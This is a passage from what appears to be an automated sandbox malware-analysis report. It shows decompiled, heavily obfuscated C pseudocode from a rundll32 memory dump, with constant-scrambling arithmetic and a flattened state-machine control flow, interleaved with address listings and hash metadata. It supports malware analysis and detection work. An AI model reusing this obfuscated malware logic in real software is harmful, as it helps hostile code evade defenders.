				_v128 = _v128 ^ 0xec4d11e9;
				_v128 = _v128 | 0xa250e655;
				_v128 = _v128 * 0x41;
				_v128 = _v128 ^ 0x8cf42415;
				_v100 = 0x6d926d;
				_t296 = 0x34;
				_v100 = _v100 / _t296;
				_v100 = _v100 ^ 0x000eb1c4;
				_v116 = 0xefa621;
				_v116 = _v116 + 0xffff82bb;
				_t297 = 0x3d;
				_v116 = _v116 * 0x32;
				_v116 = _v116 ^ 0x2eb07dcc;
				_v88 = 0x5b377;
				_v88 = _v88 + 0x8d9;
				_v88 = _v88 ^ 0x00067740;
				_v112 = 0x4d19ae;
				_v112 = _v112 ^ 0x630c5599;
				_v112 = _v112 ^ 0xe5b09bfb;
				_v112 = _v112 ^ 0x86f4ef46;
				_v148 = 0x4966c6;
				_v148 = _v148 / _t297;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0x19f6490a;
				_v148 = _v148 ^ 0x19fea643;
				_v104 = 0x4e28a7;
				_v104 = _v104 ^ 0x0c2039e4;
				_t298 = 0x43;
				_v104 = _v104 / _t298;
				_v104 = _v104 ^ 0x002b1fa2;
				_v96 = 0xfd59a6;
				_v96 = _v96 ^ 0x1da99ba6;
				_v96 = _v96 ^ 0x1d58c7ea;
				_v92 = 0x8125dc;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x409d3f45;
				_v124 = 0x45818f;
				_v124 = _v124 ^ 0x2c821393;
				_v124 = _v124 << 0xc;
				_v124 = _v124 + 0x7cf7;
				_v124 = _v124 ^ 0x792e1e67;
				do {
					while(_t249 != 0x4baccf8) {
						if(_t249 == 0x7c30f3d) {
							_t231 = E003564F1( &_v52, _v156,  &_v16, _v128);
							_pop(_t254);
							if(_t231 != 0) {
								_push(_t254);
								_t242 = E00353512(_v48);
								 *_t291 = _t242;
								if(_t242 != 0) {
									E0035FD29(_v52, _v112,  *_t291, _v148, _v48);
									_t301 =  &(_t301[3]);
									 *((intOrPtr*)(_t291 + 4)) = _v48;
									_t289 = 1;
								}
							}
							_t249 = 0xf7122fc;
							continue;
						}
						if(_t249 == 0x9cf6742) {
							_t234 = E003604DE(_v144, _v120,  &_v76,  &_v68, _v108);
							_t301 =  &(_t301[3]);
							asm("sbb ecx, ecx");
							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
							continue;
						}
						if(_t249 == 0xa47caa1) {
							_t249 = 0x4baccf8;
							continue;
						}
						if(_t249 == 0xbfbcb36) {
							if(E0035CC89( &_v76,  &_v84, _v152) == 0) {
								L8:
								return _t289;
							}
							_t249 = 0x9cf6742;
							continue;
						}
						if(_t249 != 0xf7122fc) {
							goto L25;
						}
						E003468DE(_v104, _v96, _v92, _v124, _v76);
						goto L8;
					}
					_t226 =  *((intOrPtr*)(_t247 + 4));
					_t250 =  *_t247;
					_v80 = _t226;
					_v84 = _t250;
					_t228 = _t226 - 1 + _t250;
					while(_t228 > _t250) {
						if( *_t228 == 0) {
							break;
						}
						_t228 = _t228 - 1;
					}
					_t229 = _t228 - _t250;
					_v80 = _t229;
					if(_t229 == 0) {
						L24:
						_t249 = 0xbfbcb36;
						goto L25;
					}
					while(_v80 % _v140 != _v132) {
						_t206 =  &_v80;
						 *_t206 = _v80 - 1;
						if( *_t206 != 0) {
							continue;
						}
						goto L24;
					}
					goto L24;
					L25:
				} while (_t249 != 0x4e0187e);
				goto L8;
			}
















































                                                                                                                      0x0034bd18
                                                                                                                      0x0034bd1f
                                                                                                                      0x0034bd22
                                                                                                                      0x0034bd29
                                                                                                                      0x0034bd2a
                                                                                                                      0x0034bd2b
                                                                                                                      0x0034bd2c
                                                                                                                      0x0034bd31
                                                                                                                      0x0034bd39
                                                                                                                      0x0034bd3c
                                                                                                                      0x0034bd4a
                                                                                                                      0x0034bd4c
                                                                                                                      0x0034bd53
                                                                                                                      0x0034bd58
                                                                                                                      0x0034bd62
                                                                                                                      0x0034bd67
                                                                                                                      0x0034bd6d
                                                                                                                      0x0034bd75
                                                                                                                      0x0034bd7d
                                                                                                                      0x0034bd85
                                                                                                                      0x0034bd8a
                                                                                                                      0x0034bd92
                                                                                                                      0x0034bd9a
                                                                                                                      0x0034bda2
                                                                                                                      0x0034bdaa
                                                                                                                      0x0034bdb2
                                                                                                                      0x0034bdba
                                                                                                                      0x0034bdc2
                                                                                                                      0x0034bdce
                                                                                                                      0x0034bdd3
                                                                                                                      0x0034bdd9
                                                                                                                      0x0034bde1
                                                                                                                      0x0034bde6
                                                                                                                      0x0034bdee
                                                                                                                      0x0034bdf6
                                                                                                                      0x0034bdfe
                                                                                                                      0x0034be03
                                                                                                                      0x0034be0b
                                                                                                                      0x0034be13
                                                                                                                      0x0034be1b
                                                                                                                      0x0034be23
                                                                                                                      0x0034be2b
                                                                                                                      0x0034be33
                                                                                                                      0x0034be3b
                                                                                                                      0x0034be3f
                                                                                                                      0x0034be42
                                                                                                                      0x0034be46
                                                                                                                      0x0034be4b
                                                                                                                      0x0034be53
                                                                                                                      0x0034be5b
                                                                                                                      0x0034be63
                                                                                                                      0x0034be6b
                                                                                                                      0x0034be70
                                                                                                                      0x0034be78
                                                                                                                      0x0034be80
                                                                                                                      0x0034be88
                                                                                                                      0x0034be95
                                                                                                                      0x0034be99
                                                                                                                      0x0034bea3
                                                                                                                      0x0034beb1
                                                                                                                      0x0034beb6
                                                                                                                      0x0034bebc
                                                                                                                      0x0034bec4
                                                                                                                      0x0034becc
                                                                                                                      0x0034bed9
                                                                                                                      0x0034bedc
                                                                                                                      0x0034bee0
                                                                                                                      0x0034bee8
                                                                                                                      0x0034bef0
                                                                                                                      0x0034bef8
                                                                                                                      0x0034bf00
                                                                                                                      0x0034bf08
                                                                                                                      0x0034bf10
                                                                                                                      0x0034bf18
                                                                                                                      0x0034bf20
                                                                                                                      0x0034bf30
                                                                                                                      0x0034bf34
                                                                                                                      0x0034bf38
                                                                                                                      0x0034bf40
                                                                                                                      0x0034bf48
                                                                                                                      0x0034bf50
                                                                                                                      0x0034bf5c
                                                                                                                      0x0034bf64
                                                                                                                      0x0034bf68
                                                                                                                      0x0034bf70
                                                                                                                      0x0034bf78
                                                                                                                      0x0034bf80
                                                                                                                      0x0034bf88
                                                                                                                      0x0034bf90
                                                                                                                      0x0034bf95
                                                                                                                      0x0034bf9d
                                                                                                                      0x0034bfa5
                                                                                                                      0x0034bfad
                                                                                                                      0x0034bfb2
                                                                                                                      0x0034bfba
                                                                                                                      0x0034bfc2
                                                                                                                      0x0034bfc2
                                                                                                                      0x0034bfd4
                                                                                                                      0x0034c09b
                                                                                                                      0x0034c0a1
                                                                                                                      0x0034c0a4
                                                                                                                      0x0034c0b3
                                                                                                                      0x0034c0bb
                                                                                                                      0x0034c0c0
                                                                                                                      0x0034c0c6
                                                                                                                      0x0034c0dd
                                                                                                                      0x0034c0eb
                                                                                                                      0x0034c0ee
                                                                                                                      0x0034c0f1
                                                                                                                      0x0034c0f1
                                                                                                                      0x0034c0c6
                                                                                                                      0x0034c0f2
                                                                                                                      0x00000000
                                                                                                                      0x0034c0f2
                                                                                                                      0x0034bfe0
                                                                                                                      0x0034c069
                                                                                                                      0x0034c06e
                                                                                                                      0x0034c075
                                                                                                                      0x0034c07d
                                                                                                                      0x00000000
                                                                                                                      0x0034c07d
                                                                                                                      0x0034bfe8
                                                                                                                      0x0034c049
                                                                                                                      0x00000000
                                                                                                                      0x0034c049
                                                                                                                      0x0034bff0
                                                                                                                      0x0034c03d
                                                                                                                      0x0034c016
                                                                                                                      0x0034c022
                                                                                                                      0x0034c022
                                                                                                                      0x0034c03f
                                                                                                                      0x00000000
                                                                                                                      0x0034c03f
                                                                                                                      0x0034bff4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c00e
                                                                                                                      0x00000000
                                                                                                                      0x0034c013
                                                                                                                      0x0034c0f9
                                                                                                                      0x0034c0fc
                                                                                                                      0x0034c0fe
                                                                                                                      0x0034c103
                                                                                                                      0x0034c107
                                                                                                                      0x0034c111
                                                                                                                      0x0034c10e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c110
                                                                                                                      0x0034c110
                                                                                                                      0x0034c115
                                                                                                                      0x0034c117
                                                                                                                      0x0034c11b
                                                                                                                      0x0034c135
                                                                                                                      0x0034c135
                                                                                                                      0x00000000
                                                                                                                      0x0034c135
                                                                                                                      0x0034c11d
                                                                                                                      0x0034c12f
                                                                                                                      0x0034c12f
                                                                                                                      0x0034c133
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c133
                                                                                                                      0x00000000
                                                                                                                      0x0034c13a
                                                                                                                      0x0034c13a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: 16c4fa2eb819fcf3cd482d26e96043f7acda7a56eca65f7b1cc7b427531373e7
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: 4FB142B15183809FC358CF25C88951BFBE1FBC8358F408A1DF5969A260D7B6DA48CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00343FB8 Relevance: 4.0, Strings: 3, Instructions: 243COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00343FB8() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				void* _t262;
				intOrPtr _t274;
				void* _t279;
				intOrPtr _t281;
				intOrPtr _t283;
				signed int _t305;
				signed int _t306;
				signed int* _t309;

				_t309 =  &_v1172;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t279 = 0xa0c284c;
				_v1056 = 0xafe7d9;
				_v1052 = 0x960b65;
				_v1120 = 0x40f49c;
				_v1120 = _v1120 + 0xc807;
				_v1120 = _v1120 * 0x4f;
				_v1120 = _v1120 ^ 0x1446f881;
				_v1116 = 0x6254e6;
				_t305 = 3;
				_v1116 = _v1116 * 5;
				_v1116 = _v1116 + 0xcc41;
				_v1116 = _v1116 ^ 0x01ee9a48;
				_v1104 = 0xc01800;
				_v1104 = _v1104 | 0x48a752a3;
				_v1104 = _v1104 ^ 0x48e65f13;
				_v1128 = 0x7c2fed;
				_v1128 = _v1128 | 0x2c3c97c8;
				_v1128 = _v1128 * 0x77;
				_v1128 = _v1128 ^ 0xadff29d3;
				_v1136 = 0x195939;
				_v1136 = _v1136 + 0xfffffbae;
				_v1136 = _v1136 * 0x49;
				_v1136 = _v1136 ^ 0x073ad8c6;
				_v1168 = 0xbc4bb5;
				_v1168 = _v1168 / _t305;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 ^ 0xd1f3631f;
				_v1168 = _v1168 ^ 0x0980812e;
				_v1084 = 0x2affe9;
				_v1084 = _v1084 >> 0xd;
				_v1084 = _v1084 ^ 0x00075e3f;
				_v1112 = 0x7143ab;
				_v1112 = _v1112 >> 0xb;
				_t306 = 0x4a;
				_v1112 = _v1112 / _t306;
				_v1112 = _v1112 ^ 0x000905fb;
				_v1100 = 0xf39387;
				_v1100 = _v1100 + 0xffffb245;
				_v1100 = _v1100 ^ 0x00f5952a;
				_v1160 = 0xdc501f;
				_v1160 = _v1160 >> 0xb;
				_v1160 = _v1160 | 0xffab4649;
				_v1160 = _v1160 * 0x4a;
				_v1160 = _v1160 ^ 0xe7809492;
				_v1076 = 0x9b6a27;
				_v1076 = _v1076 >> 9;
				_v1076 = _v1076 ^ 0x0000c221;
				_v1132 = 0x7dd85e;
				_v1132 = _v1132 + 0xffff3c07;
				_v1132 = _v1132 ^ 0x5ccf103a;
				_v1132 = _v1132 ^ 0x5cb197cc;
				_v1060 = 0x3a660e;
				_v1060 = _v1060 ^ 0x9c30fae7;
				_v1060 = _v1060 ^ 0x9c0496c9;
				_v1124 = 0xd6fa60;
				_v1124 = _v1124 >> 0xc;
				_v1124 = _v1124 * 0x63;
				_v1124 = _v1124 ^ 0x0000f3a0;
				_v1088 = 0xffa7cd;
				_v1088 = _v1088 ^ 0xcc4f33e8;
				_v1088 = _v1088 ^ 0xccbde027;
				_v1096 = 0xc2302a;
				_v1096 = _v1096 ^ 0x3cf81aba;
				_v1096 = _v1096 ^ 0x3c3bc632;
				_v1064 = 0x2b9d03;
				_v1064 = _v1064 + 0xffffce76;
				_v1064 = _v1064 ^ 0x0029f92b;
				_v1164 = 0x820e56;
				_v1164 = _v1164 >> 0xd;
				_v1164 = _v1164 + 0xa8ad;
				_v1164 = _v1164 | 0xfa0f2dae;
				_v1164 = _v1164 ^ 0xfa046831;
				_v1068 = 0x2883d9;
				_v1068 = _v1068 + 0xffff633a;
				_v1068 = _v1068 ^ 0x0026d05d;
				_v1156 = 0x6f33fd;
				_v1156 = _v1156 << 0xe;
				_v1156 = _v1156 + 0xfcd0;
				_v1156 = _v1156 + 0x75bd;
				_v1156 = _v1156 ^ 0xcd0f8dab;
				_v1172 = 0xb8c1fe;
				_v1172 = _v1172 << 6;
				_v1172 = _v1172 * 0x6a;
				_v1172 = _v1172 << 4;
				_v1172 = _v1172 ^ 0x014ff662;
				_v1148 = 0xbed93a;
				_v1148 = _v1148 * 0x3e;
				_v1148 = _v1148 << 0xa;
				_v1148 = _v1148 ^ 0x5e071c48;
				_v1148 = _v1148 ^ 0xbc7b36e3;
				_v1092 = 0x46d8d3;
				_v1092 = _v1092 << 5;
				_v1092 = _v1092 ^ 0x08d1099a;
				_v1140 = 0x5a5c4c;
				_v1140 = _v1140 ^ 0xa959b0b3;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 ^ 0x481958d7;
				_v1080 = 0xac3d63;
				_v1080 = _v1080 * 0x50;
				_v1080 = _v1080 ^ 0x35d8e2dc;
				_v1152 = 0x840294;
				_v1152 = _v1152 + 0xffff0ee6;
				_v1152 = _v1152 ^ 0xf9fb415c;
				_v1152 = _v1152 | 0x82095beb;
				_v1152 = _v1152 ^ 0xfb725375;
				_v1072 = 0xb67c6d;
				_v1072 = _v1072 + 0xffffc0d8;
				_v1072 = _v1072 ^ 0x00b2e767;
				_v1144 = 0x5c5bd3;
				_v1144 = _v1144 ^ 0x420c1b91;
				_v1144 = _v1144 * 0x79;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 ^ 0x002d898c;
				_v1108 = 0xefd7e6;
				_v1108 = _v1108 * 0x73;
				_v1108 = _v1108 * 0x61;
				_v1108 = _v1108 ^ 0xd2fa3683;
				do {
					while(_t279 != 0x10bc038) {
						if(_t279 == 0x5d7fb4e) {
							E003541A7();
							L11:
							_t279 = 0x10bc038;
							continue;
						}
						if(_t279 == 0x666e3d5) {
							E003444FA( &_v520, _v1064, _v1164, _v1068, _v1156);
							_push( &_v1040);
							_push( &_v520);
							_push(_v1092);
							E00348D95(_v1172, _v1148, __eflags);
							_t309 =  &(_t309[6]);
							_t279 = 0xe0c3523;
							continue;
						}
						if(_t279 == 0x90d07ee) {
							_t274 = E003504B8();
							goto L11;
						}
						if(_t279 == 0xa0c284c) {
							_t274 =  *0x36520c; // 0x0
							__eflags =  *((intOrPtr*)(_t274 + 0x438));
							_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
							continue;
						}
						if(_t279 != 0xe0c3523) {
							goto L15;
						}
						 *((short*)(E00354FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
						return E00345B6B(_v1072, _v1144,  &_v1040, _v1108);
					}
					_push(_v1112);
					_push(_v1084);
					_push(0x3410cc);
					_t262 = E0034AB66(_v1136, _v1168, __eflags);
					_t281 =  *0x36520c; // 0x0
					_t283 =  *0x36520c; // 0x0
					__eflags = _t283 + 8;
					E0034E7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
					E0034AE03(_v1124, _v1088, _v1096, _t262);
					_t309 =  &(_t309[0xd]);
					_t279 = 0x666e3d5;
					L15:
					__eflags = _t279 - 0xfda68b3;
				} while (__eflags != 0);
				return _t274;
			}














































                                                                                                                      0x00343fb8
                                                                                                                      0x00343fbe
                                                                                                                      0x00343fc5
                                                                                                                      0x00343fcd
                                                                                                                      0x00343fd2
                                                                                                                      0x00343fda
                                                                                                                      0x00343fe2
                                                                                                                      0x00343fea
                                                                                                                      0x00343ffb
                                                                                                                      0x00343fff
                                                                                                                      0x00344007
                                                                                                                      0x00344016
                                                                                                                      0x00344019
                                                                                                                      0x0034401d
                                                                                                                      0x00344025
                                                                                                                      0x0034402d
                                                                                                                      0x00344035
                                                                                                                      0x0034403d
                                                                                                                      0x00344045
                                                                                                                      0x0034404d
                                                                                                                      0x0034405a
                                                                                                                      0x0034405e
                                                                                                                      0x00344066
                                                                                                                      0x0034406e
                                                                                                                      0x0034407b
                                                                                                                      0x0034407f
                                                                                                                      0x00344087
                                                                                                                      0x00344097
                                                                                                                      0x0034409b
                                                                                                                      0x003440a0
                                                                                                                      0x003440a8
                                                                                                                      0x003440b0
                                                                                                                      0x003440b8
                                                                                                                      0x003440bd
                                                                                                                      0x003440c5
                                                                                                                      0x003440cd
                                                                                                                      0x003440d6
                                                                                                                      0x003440d9
                                                                                                                      0x003440dd
                                                                                                                      0x003440e5
                                                                                                                      0x003440ed
                                                                                                                      0x003440f5
                                                                                                                      0x003440fd
                                                                                                                      0x00344105
                                                                                                                      0x0034410a
                                                                                                                      0x00344117
                                                                                                                      0x0034411b
                                                                                                                      0x00344123
                                                                                                                      0x0034412b
                                                                                                                      0x00344130
                                                                                                                      0x00344138
                                                                                                                      0x00344140
                                                                                                                      0x00344148
                                                                                                                      0x00344150
                                                                                                                      0x00344158
                                                                                                                      0x00344163
                                                                                                                      0x0034416e
                                                                                                                      0x00344179
                                                                                                                      0x00344181
                                                                                                                      0x0034418b
                                                                                                                      0x0034418f
                                                                                                                      0x00344197
                                                                                                                      0x0034419f
                                                                                                                      0x003441a7
                                                                                                                      0x003441af
                                                                                                                      0x003441bc
                                                                                                                      0x003441c9
                                                                                                                      0x003441d6
                                                                                                                      0x003441de
                                                                                                                      0x003441e6
                                                                                                                      0x003441ee
                                                                                                                      0x003441f6
                                                                                                                      0x003441fb
                                                                                                                      0x00344203
                                                                                                                      0x0034420b
                                                                                                                      0x00344213
                                                                                                                      0x0034421b
                                                                                                                      0x00344223
                                                                                                                      0x0034422b
                                                                                                                      0x00344233
                                                                                                                      0x00344238
                                                                                                                      0x00344240
                                                                                                                      0x00344248
                                                                                                                      0x00344250
                                                                                                                      0x00344258
                                                                                                                      0x00344262
                                                                                                                      0x00344266
                                                                                                                      0x0034426b
                                                                                                                      0x00344273
                                                                                                                      0x00344280
                                                                                                                      0x00344284
                                                                                                                      0x00344289
                                                                                                                      0x00344291
                                                                                                                      0x00344299
                                                                                                                      0x003442a1
                                                                                                                      0x003442a6
                                                                                                                      0x003442ae
                                                                                                                      0x003442b6
                                                                                                                      0x003442be
                                                                                                                      0x003442c3
                                                                                                                      0x003442cb
                                                                                                                      0x003442d8
                                                                                                                      0x003442dc
                                                                                                                      0x003442e4
                                                                                                                      0x003442ec
                                                                                                                      0x003442f4
                                                                                                                      0x003442fc
                                                                                                                      0x00344304
                                                                                                                      0x0034430c
                                                                                                                      0x00344314
                                                                                                                      0x0034431c
                                                                                                                      0x00344324
                                                                                                                      0x0034432c
                                                                                                                      0x00344339
                                                                                                                      0x0034433d
                                                                                                                      0x00344342
                                                                                                                      0x0034434a
                                                                                                                      0x00344357
                                                                                                                      0x00344360
                                                                                                                      0x00344364
                                                                                                                      0x0034436c
                                                                                                                      0x0034436c
                                                                                                                      0x00344376
                                                                                                                      0x00344466
                                                                                                                      0x0034440a
                                                                                                                      0x0034440a
                                                                                                                      0x00000000
                                                                                                                      0x0034440a
                                                                                                                      0x00344382
                                                                                                                      0x0034442b
                                                                                                                      0x00344437
                                                                                                                      0x0034443f
                                                                                                                      0x00344440
                                                                                                                      0x0034444c
                                                                                                                      0x00344451
                                                                                                                      0x00344454
                                                                                                                      0x00000000
                                                                                                                      0x00344454
                                                                                                                      0x0034438a
                                                                                                                      0x00344405
                                                                                                                      0x00000000
                                                                                                                      0x00344405
                                                                                                                      0x00344392
                                                                                                                      0x003443e7
                                                                                                                      0x003443ee
                                                                                                                      0x003443f5
                                                                                                                      0x00000000
                                                                                                                      0x003443f5
                                                                                                                      0x0034439a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003443c2
                                                                                                                      0x00000000
                                                                                                                      0x003443d9
                                                                                                                      0x0034446d
                                                                                                                      0x00344471
                                                                                                                      0x0034447d
                                                                                                                      0x00344482
                                                                                                                      0x00344487
                                                                                                                      0x003444af
                                                                                                                      0x003444b5
                                                                                                                      0x003444c4
                                                                                                                      0x003444dc
                                                                                                                      0x003444e1
                                                                                                                      0x003444e4
                                                                                                                      0x003444e9
                                                                                                                      0x003444e9
                                                                                                                      0x003444e9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: 4fbffdc7144ad949a19b3b518696e7bb880ac34143660a7b14b93cfdfe8ff90b
                                                                                                                      • Instruction ID: 42a99d42d2718a5d5c8bf27ca5af44d11607ded2cf37daca21dabe85a188eb2b
                                                                                                                      • Opcode Fuzzy Hash: 4fbffdc7144ad949a19b3b518696e7bb880ac34143660a7b14b93cfdfe8ff90b
                                                                                                                      • Instruction Fuzzy Hash: E7D1E1714087818FC769CF61C48961FFBE0FBC4758F108A1DF2A69A260D7B59A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034F93D Relevance: 4.0, Strings: 3, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034F93D() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t255;
				void* _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				void* _t266;
				intOrPtr _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int* _t315;

				_t315 =  &_v1140;
				_v1056 = 0x7fa207;
				_v1052 = 0x3c49bf;
				_t266 = 0x35a8362;
				_t302 = 0;
				_v1048 = 0;
				_v1044 = 0;
				_v1060 = 0xe96fdd;
				_v1060 = _v1060 + 0xffff4dc5;
				_v1060 = _v1060 ^ 0x00e8fae7;
				_v1084 = 0x95aacc;
				_t303 = 0x76;
				_v1084 = _v1084 / _t303;
				_v1084 = _v1084 ^ 0x00004e07;
				_v1132 = 0x8ad3c0;
				_t304 = 0x3b;
				_v1132 = _v1132 / _t304;
				_t305 = 5;
				_v1132 = _v1132 / _t305;
				_t306 = 0x2e;
				_v1132 = _v1132 / _t306;
				_v1132 = _v1132 ^ 0x0002326f;
				_v1136 = 0x5025c5;
				_v1136 = _v1136 | 0xd1709035;
				_v1136 = _v1136 + 0xfffff598;
				_v1136 = _v1136 | 0xced027f9;
				_v1136 = _v1136 ^ 0xdffed43e;
				_v1076 = 0x8b6e07;
				_v1076 = _v1076 ^ 0x693ed631;
				_v1076 = _v1076 ^ 0x69bbe5bc;
				_v1096 = 0x201396;
				_v1096 = _v1096 ^ 0x88694b71;
				_v1096 = _v1096 + 0xffff467e;
				_v1096 = _v1096 ^ 0x884e23ab;
				_v1068 = 0x6d8c34;
				_v1068 = _v1068 ^ 0x91e2fcbf;
				_v1068 = _v1068 ^ 0x9185a139;
				_v1128 = 0x807b8c;
				_v1128 = _v1128 | 0x3609e9e3;
				_v1128 = _v1128 + 0xffff6ddf;
				_v1128 = _v1128 + 0xffffdf1a;
				_v1128 = _v1128 ^ 0x3687a3ab;
				_v1104 = 0xe6d4b9;
				_v1104 = _v1104 >> 0xd;
				_t307 = 0x48;
				_v1104 = _v1104 / _t307;
				_v1104 = _v1104 * 0x6c;
				_v1104 = _v1104 ^ 0x0006818d;
				_v1064 = 0xd65a00;
				_v1064 = _v1064 + 0x372a;
				_v1064 = _v1064 ^ 0x00dea864;
				_v1088 = 0x4d0087;
				_v1088 = _v1088 + 0xffffb4c7;
				_v1088 = _v1088 ^ 0x0a5aafbb;
				_v1088 = _v1088 ^ 0x0a1526df;
				_v1092 = 0x9c5ab3;
				_t308 = 0x3c;
				_v1092 = _v1092 / _t308;
				_v1092 = _v1092 >> 1;
				_v1092 = _v1092 ^ 0x000c3f19;
				_v1140 = 0x5b7912;
				_v1140 = _v1140 + 0xffff68b5;
				_t309 = 0x6d;
				_v1140 = _v1140 * 0xe;
				_v1140 = _v1140 >> 1;
				_v1140 = _v1140 ^ 0x02711af4;
				_v1120 = 0xf0336c;
				_v1120 = _v1120 + 0x850d;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 / _t309;
				_v1120 = _v1120 ^ 0x00151fd7;
				_v1112 = 0x1d5cd4;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 | 0x8feadd76;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 ^ 0xff743f21;
				_v1116 = 0x1a947a;
				_v1116 = _v1116 + 0x75f0;
				_v1116 = _v1116 << 0xa;
				_t310 = 0x5a;
				_v1116 = _v1116 * 0x6e;
				_v1116 = _v1116 ^ 0x79e60e9e;
				_v1124 = 0xbb349e;
				_v1124 = _v1124 / _t310;
				_v1124 = _v1124 << 8;
				_t311 = 0x54;
				_v1124 = _v1124 / _t311;
				_v1124 = _v1124 ^ 0x000c08c5;
				_v1080 = 0xb1ec11;
				_v1080 = _v1080 | 0x4ad04b34;
				_v1080 = _v1080 ^ 0x4af1877a;
				_v1072 = 0x6450ea;
				_v1072 = _v1072 ^ 0x5bd0ca6d;
				_v1072 = _v1072 ^ 0x5bbfa4d9;
				_v1100 = 0x193680;
				_v1100 = _v1100 + 0xffff84f1;
				_t312 = 0x39;
				_v1100 = _v1100 / _t312;
				_v1100 = _v1100 ^ 0x185ca7c1;
				_v1100 = _v1100 ^ 0x1855126a;
				_v1108 = 0xe40e26;
				_v1108 = _v1108 + 0xffff805f;
				_v1108 = _v1108 << 4;
				_v1108 = _v1108 ^ 0x0e3caf6d;
				do {
					while(_t266 != 0x35a8362) {
						if(_t266 == 0x706ecca) {
							E0035E498(_v1072, _v1100, _v1108,  &_v1040);
						} else {
							if(_t266 == 0xd630330) {
								_push( &_v520);
								_push( &_v1040);
								_push(_v1080);
								_t255 = E00348D95(_v1116, _v1124, __eflags);
								_t315 =  &(_t315[3]);
								__eflags = _t255;
								_t302 =  !=  ? 1 : _t302;
								_t266 = 0x706ecca;
								continue;
							} else {
								if(_t266 == 0xdb8f695) {
									E003612A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
									_t315 =  &(_t315[3]);
									_t266 = 0xe8d55c7;
									continue;
								} else {
									_t322 = _t266 - 0xe8d55c7;
									if(_t266 != 0xe8d55c7) {
										goto L10;
									} else {
										_push(_v1068);
										_push(_v1096);
										_push(0x3410cc);
										_t258 = E0034AB66(_v1136, _v1076, _t322);
